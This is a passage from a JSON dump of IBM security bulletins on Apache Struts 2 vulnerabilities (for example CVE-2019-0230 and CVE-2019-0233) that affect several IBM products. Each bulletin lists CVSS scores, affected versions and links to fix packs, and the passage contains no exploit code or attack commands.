SFP2) \nIBM Sterling Field Sales 9.0 - (SFS9.0- SFP2) \nIBM Sterling Field Sales 9.1.0 - (SFS9.1.0- SFP2) \nIBM Sterling Field Sales 9.2.0 - (SFS9.2.0- SFP2) \nIBM Sterling Field Sales 9.2.1 - (SFS9.2.1- SFP2)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SS6QYM\",\"label\":\"Sterling Selling and Fulfillment Suite\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"9.2.1;9.2;9.1;9.0;8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {}, "published": "2020-02-11T21:39:06", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management, IBM Sterling Configure, Price, Quote and Sterling Web Channel are affected by Apache Struts 2 security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113"], "modified": "2020-02-11T21:39:06", "id": "85068BA05AFB9468D768F124D70E29FEAA718CF85C40196DF1FFB790C80EABFF", "href": "https://www.ibm.com/support/pages/node/514267", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:51:21", "description": "## Summary\n\nIBM Sterling Order Management uses Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3093_](<https://vulners.com/cve/CVE-2016-3093>) \n**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n\n**CVEID:** [_CVE-2016-4436_](<https://vulners.com/cve/CVE-2016-4436>) \n**DESCRIPTION:** An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114183_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0 \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.5.0| **_9.5.0-SFP1_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP2_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP4_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1- SFP5_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP5_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP5_**| [**__http://www-933.ibm.com/support/fixcentral/options__**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T20:08:21", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management is affected by Apache Struts 2 security vulnerabilities (CVE-2016-3093 , CVE-2016-4436)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3093", "CVE-2016-4436"], "modified": "2018-06-16T20:08:21", "id": "D3960A5391CDBC3EFE71D2AF6765F7AAC5104A881ACFC37A5D48C02CA2E26DF0", "href": "https://www.ibm.com/support/pages/node/293437", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:08:30", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:08:30", "id": "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "href": "https://www.ibm.com/support/pages/node/6356619", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:50:43", "description": "## Summary\n\nFix is available for vulnerabilities in Apache Struts affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.x \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| APAR | Remediation/First Fix \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI| 8.1.0| IJ27034| Apply Fix Pack 20 \n([Fix Pack for WebGUI 8.1.0 Fix Pack 20](<https://www.ibm.com/support/pages/node/6236916> \"Fix Pack for WebGUI 8.1.0 Fix Pack 20\" )) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-23T04:29:58", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-09-23T04:29:58", "id": "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "href": "https://www.ibm.com/support/pages/node/6336355", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:44:04", "description": "## Summary\n\nVulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager (CVE-2019-0233, CVE-2019-0230)\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n**DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Application Dependency Discovery Manager | 7.3.0.7 \n \n## Remediation/Fixes\n\n**Fix** | **VRMF** | **APAR** | **How to acquire fix** \n---|---|---|--- \nefix_struts2.5.22_FP7200218.zip | 7.3.0.7 | None | [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=UpR3LS6M2oBcbLFNfcXFzqCsw2d008xhOwZDwfQ15h0> \"Download eFix\" ) \n \nPlease get familiar with eFix readme in etc/<efix_name>_readme.txt\n\n## Workarounds and Mitigations\n\nThe above eFix is applicable can be downloaded and applied directly.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T13:33:14", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2021-04-13T13:33:14", "id": "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "href": "https://www.ibm.com/support/pages/node/6347964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:13", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:04:41", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:04:41", "id": "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "href": "https://www.ibm.com/support/pages/node/6359443", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:12", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:07:08", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:07:08", "id": "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "href": "https://www.ibm.com/support/pages/node/6359445", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:22", "description": "## Summary\n\nIBM Sterling Order Management Apache Struts vulnerablity\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: 